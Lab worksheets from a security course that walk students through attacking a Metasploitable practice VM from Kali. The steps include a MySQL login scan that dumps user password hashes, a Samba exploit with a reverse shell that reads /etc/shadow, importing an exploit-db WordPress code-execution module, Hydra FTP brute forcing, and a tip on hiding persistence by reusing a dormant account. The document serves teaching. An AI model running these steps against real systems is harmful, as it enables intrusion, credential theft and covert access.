b. Paste your screenshot here:-
18. Type: msfconsole
19. Scan your target for database technologies. Try to identify running database services on your target’s ports. Type: nmap x.x.x.x (replace x.x.x.x with the ip address you noted in step 5)
20. Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.
21. Metasploit has multiple MySQL exploits. Type: search mysql
22. Type: use auxiliary/scanner/mysql/mysql_login
23. Type: info
24. Type: set rhosts x.x.x.x (IP of Metasploitable VM.)
25. Type: set username root
26. Type: set stop_on_success true
27. Let’s confirm the changes you made took. Type: info
28. Type: exploit
29. You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.
30. Open a new shell by clicking on the black box to the right of the word “Places”.
31. Type: mysql –h x.x.x.x (replace the x.x.x.x with the IP of Metasploitable. See step 5) –u root
32. Type: show databases;
33. Let’s pick a database and explore it. Type: use dvwa;
34. Now that we’ve picked a database let’s view the tables. Type: show tables;
35. Let’s see what data is being held in this table. Type: show columns from users;
36. Columns of interest are “user” and “password”. Type: select user, password from users;
37. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.
Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.
Once you have completed this worksheet please upload it via the link on Blackboard for grading.
Network Attack Lab
Class: SEC6070
Name:
Date:
In this lab we will explore a Metasploit based network share exploitation.
38. If Metasploitable isn't already running launch the Metasploitable VM.
39. At the user logon prompt type: msfadmin
40. At the password prompt type: msfadmin
41. Type: ifconfig
42. Record the IP address here:
a. Paste screenshot here:-
43. Now switch to Kali.
44. Open a shell by clicking on the black box next to the word “Places”.
45. Let’s look for network share technologies in use. Type: nmap -A -p 139,445 x.x.x.x (replace the x.x.x.x with the IP of Metasploitable see step 5.)
We’ve gathered information on the network share technology being used. Now let’s launch Metasploit and use the relevant attack modules to exploit vulnerabilities in the network sharing technology we’ve identified.
46. Launch Metasploit. Type: msfconsole
47. Let’s search Metasploit’s database for samba exploits. Type: search samba
48. Type: use exploit/multi/samba/usermap_script
49. Type: info
a. Paste screenshot here:-
50. Type: set rhost x.x.x.x (replace x.x.x.x with the IP of Metasploitable VM. See step 5)
51. Type: set payload cmd/unix/reverse
52. Type: set lhost x.x.x.x (replace x.x.x.x with the IP address of KALI.)
53. Let’s confirm the changes you made took. Type: info
a. Paste screenshot here:-
54. Type: exploit
a. Paste screenshot here:-
55. Type: whoami
a. Paste screenshot here:-
56. Type: pwd
a. Paste screenshot here:-
57. Type: cat /etc/shadow
a. Paste screenshot here:-
58. Type: cat /etc/passwd
a. Paste screenshot here:-
Mission accomplished!
Closing thought: “whoami” returned “root”. You could create an account and set the password or you could use the “passwd” command to change the password on an account that hasn’t recently been used. That way if the /etc/passwd or /etc/shadow file are examined no new accounts would be identified. The possibilities are only limited to your imagination.
Once you have completed this worksheet please upload it via the link on Blackboard for grading
Updating Metasploit Lab
Class: SEC6070
Name:
Date:
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".
3. Launch Metasploit by typing: msfconsole
There are many reasons to update Metasploit. Updating Metasploit will install bug fixes, new community tools, and most importantly - add exploit modules. There are two ways to do this. Your first option is to update Metasploit in an automated fashion by typing "msfupdate" at the command line. This requires registration with Rapid7 for a community edition key. This will update Metasploit with the latest settings, ruby version, modules, etc. You may also simply update Kali by going to “Applications-System Tools-Software Update”. The second way to update Metasploit is manually. Being able to update Metasploit is important because it allows you to import the latest exploits, regardless of where you find them, as long as they follow Rapid7's development rules for Metasploit modules. It's also important because the automated update tool will sometimes break your Metasploit install by modifying your Ruby version or making another change to your environment. This lab will focus on sharpening your skills as penetration testers by having you search for an exploit online, download the exploit, install the exploit, and test the exploit. There is a third way to update Metasploit - Build your own module. You'll have to know how to program in Ruby. You can learn more about Metasploit exploit development here: http://www.offensive-security.com/metasploit-unleashed/Exploit_Development
1. Using your Kali VM, open the Iceweasel web browser by clicking on the icon to the right of the word “Places” and navigate to: http://www.exploit-db.com/ Wordpress is a popular content management system used for blogging on the world wide web. It has been in the news recently for having multiple vulnerabilities.
2. Click on the "Search" button.
3. In the "Free Text Search" field type: Wordpress
4. Click "Search".
5. Look at the exploits and notice the information on the left of the screen. One of the most important things to notice is the check mark. The check mark indicates the exploit has been vetted by the Rapid7 community. It's critical that you only import and use trusted exploits. Otherwise, you could be importing a trojan horse, or worse, onto your system or your customer's system.
6. Go to page 9 and click on "Wordpress HMS Testimonials Plugin 2.0.10 - Multiple Vulnerabilities".
7. Who is the author of this exploit?
7a. Answer:
8. What date was this exploit published?
8a. Answer:
9. Now click the download icon next to these words "Exploit Code:".
10. What type of file is this?
10a. Answer:
11. Open the file that you downloaded. As you can see these are instructions for exploiting a WordPress vulnerability in the way user feedback may be posted. So how would you go about loading this module into Metasploit? You wouldn't. This is simply a text file that walks through manually exploiting WordPress but I chose to show it to you because, as you can see, when you're looking for the latest exploits you don't always need to load a module. There are hands-on instructions for exploiting this vulnerability. If there isn’t a current exploit in Metasploit for your vulnerability be sure to check Exploit-db.com, not just for modules but also for hands-on exploit instructions.
Metasploit is built on the Ruby programming framework. This means that our modules need to be .rb files. Any exploits that we want to import will need to be converted to Ruby code if they aren't already.
12. Close the text file and return to the web page. Go to page 9 and locate this exploit and click on it: Wordpress W3 Total Cache PHP Code Execution
13. Click the download icon. When prompted to save the file name it: wordpress_w3_php_code_exec.rb Hit the drop-down arrow next to "Save in folder:" and select "Desktop".
14. Click "Save".
15. Minimize all of your windows. You should see a Ruby file on your desktop.
16. Switch your focus to your Metasploit instance. How many exploits are listed? Type: banner
16a. Answer:
17. Now it's time to import your new Ruby file to the Metasploit framework. Open a shell by clicking on the black box next to the word "Places" at the top of your desktop screen. Type this to copy in your new exploit: cp /root/Desktop/wordpress_w3_php_code_exec.rb
/usr/share/metasploit-framework/modules/exploits/multi/php
18. Switch back to your Metasploit shell and type: reload_all
19. How many exploits do you have now?
19a. Answer:
20. Type: use exploit/multi/php/wordpress_w3_php_code_exec
21. Type: info
What does this module do?
21a. Answer:
You now have a better understanding of when to download an exploit versus updating your entire Metasploit install. You've downloaded an exploit that you needed and manually added it to Metasploit. You've looked for a recently published exploit, download it, copied it to the appropriate location within Metasploit, and verified its availability as a module.
Now let’s look at the professional version of Metasploit.
Type: go_pro
Follow the prompts to upgrade your Metasploit version from the framework edition to the professional version.
Password Brute Forcing Lab
Class: SEC6070
Name:
Date:
1. Open VMware Player and launch the Kali VM and login as root with your
password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of
the desktop, to the right of the word "Places".
3. Open another instance of VMware Player and launch the Metasploitable VM.
4. At the user logon prompt type: msfadmin
5. At the password prompt type: msfadmin
6. Type: ifconfig
7. Record the IP address here:
Hydra is a password brute forcing tool that supports many protocols. These are
just a few of the protocols: Samba, Cisco, IMAP, POP3, FTP, LDAP, Telnet, HTTP
Auth, VNC, MySQL, NNTP, SNMP
Let's look at Hydra's options.
1. Switch your focus to the Kali VM and, using the shell you already opened,
type: hydra
1a. Observe the commands available to configure Hydra.
We need wordlists to perform our bruteforcing.
2. Type: cd /usr/share/wordlists
The wordlist we want is zipped up to save space. Let's unzip it.
3. Type: gunzip rockyou.txt.gz
Now let's use Hydra.
4. Type: hydra -l ftp -P /usr/share/wordlists/rockyou.txt -f -v x.x.x.x (target IP address) ftp
What is/are the password(s) to the ftp user account?
4a. ANSWER:
Let's test our findings.
5. Type: ftp x.x.x.x (IP of Metasploitable)
6. Type your username you found.
7. Type your password you found.
Confirm you have logged in.
8. Type: quit
As you can see, Hydra is a powerful password brute forcing tool. Some
applications of this tool are readily obvious. Hydra may be used to test
systems over the internet such as MySQL databases or Cisco devices.
But what about offline password cracking? John the Ripper is a popular
password cracking tool. It cracks password hashes offline, meaning you've
gathered the password hashes from sources such as a Windows SAM file or a Linux
shadow file and you are now going to run John the Ripper against those password
hash files. To learn more about John the Ripper type: John